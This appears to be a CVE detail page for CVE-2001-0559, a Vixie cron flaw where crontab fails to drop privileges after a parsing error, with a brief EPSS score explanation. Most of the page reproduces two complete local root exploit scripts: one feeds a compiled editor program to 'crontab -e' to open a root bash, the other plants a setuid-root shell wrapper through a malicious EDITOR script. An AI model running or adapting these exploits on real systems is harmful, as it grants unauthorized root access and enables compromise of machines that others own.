CVE-2001-0559 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

source: https://www.securityfocus.com/bid/2687/info Vixie cron is an implementation of the popular UNIX program that runs user-specified programs at periodic scheduled times. When a parsing error occurs after a modification operation, crontab will fail to drop privileges correctly for subsequent modification operations. This vulnerability may be exploited to gain root privileges locally. #!/bin/bash clear echo ".-----------------------------------------------------------." echo "| Marchew.Hyperreal presents: vixie crontab exploit #728371 |" echo "|===========================================================|" echo "| Sebastian Krahmer <[email protected]> |" echo "| Michal Zalewski <[email protected]> |" echo "\`-----------------------------------------------------------'" echo test "$CRONBIN" = "" && CRONBIN=/usr/bin/crontab echo ">>> Using binary: $CRONBIN" echo -n ">>> Setuid check: " if [ -u $CRONBIN ]; then echo "PASSED" else echo "FAILED" echo exit 1 fi echo -n ">>> Version check: " QQ=`strings $CRONBIN | grep '43 vixie Exp'` if [ "$QQ" = "" ]; then echo "FAILED" echo exit 1 else echo "PASSED" fi echo ">>> Building exploit..." cat >edit0r.c <<_eof_ #include <stdio.h> int main(int argc,char* argv[]) { sleep(1); if (geteuid()) { FILE* x=fopen(argv[1],"w"); fprintf(x,"blah blah blah\n"); fclose(x); } else { dup2(1,0); dup2(1,2); printf("\n>>> Entering rootshell, babe...\n"); system("touch $HOME/.xploited"); system("bash"); } } _eof_ gcc edit0r.c -o edit0r &>/dev/null rm -f edit0r.c if [ ! -f edit0r ]; then echo ">>> Cannot compile exploit." echo exit 1 fi rm -f ~/.xploited echo ">>> Performing attack..." ( echo "y"; echo "n" ) | VISUAL=$PWD/edit0r $CRONBIN -e 2>/dev/null rm -f edit0r if [ -f ~/.xploited ]; then echo echo ">>> Thank you." rm -f ~/.xploited echo exit 0 else echo echo ">>> Apparently I am not able to exploit it, sorry..." echo exit 1 fi

source: https://www.securityfocus.com/bid/2687/info Vixie cron is an implementation of the popular UNIX program that runs user-specified programs at periodic scheduled times. When a parsing error occurs after a modification operation, crontab will fail to drop privileges correctly for subsequent modification operations. This vulnerability may be exploited to gain root privileges locally. #!/bin/sh # # cronboom - simple proof-of-concept exploit for vixie cron version 3.1pl1 # # synopsis: # the crontab file maintenance program (crontab) fails to drop privileges # before invoking the editor under certain circumstances. # # description: # a serialization error exists in some versions of the file maintenance # program, crontab. the vulnerability was introduced in versions which # were patched for seperate vulnerability in fall of 2000 (see Bugtraq # ID #1960). # # when a parsing error occurs after a modification operation, crontab will # fail to drop privileges correctly for subsequent modification operations. # because the program is installed setuid root, it may be possible for a # local user to gain root privileges. # # affected versions: # cron_3.0pl1-57.2 distributed with Debian Linux 2.2. # # note that copies of the program with the patch mentioned above are likely # to also be vulnerable. # # references: # https://www.securityfocus.com/bid/2687 # # 05/07/01 [email protected] CRONTAB=/usr/bin/crontab if ! test -x $CRONTAB; then echo "** unable to locate crontab executable, exiting" exit 1 fi cat > vcsh.c << EOF #include <unistd.h> int main() { setuid(0); setgid(0); execl("/bin/sh", "sh", NULL); } EOF echo "** compiling shell wrapper as $PWD/vcsh" cc -o $PWD/vcsh $PWD/vcsh.c if ! test -x $PWD/vcsh; then echo "** compilation failed, exiting" exit 1 fi echo "** creating simple exploit script as $PWD/vcex.sh" cat > vcex.sh << EOF #!/bin/sh sleep 1 && echo "foo" >> \$1 if test -f $PWD/vcboom; then chown root.root $PWD/vcsh chmod 4755 $PWD/vcsh rm $PWD/vcboom else touch $PWD/vcboom fi EOF chmod 0755 $PWD/vcex.sh echo "** running $CRONTAB -e" echo "**" echo "** enter 'yes' at the first prompt, then enter 'no' at the second" echo (EDITOR=$PWD/vcex.sh $CRONTAB -e) echo echo "** done, the shell wrapper should be suid root" exit 0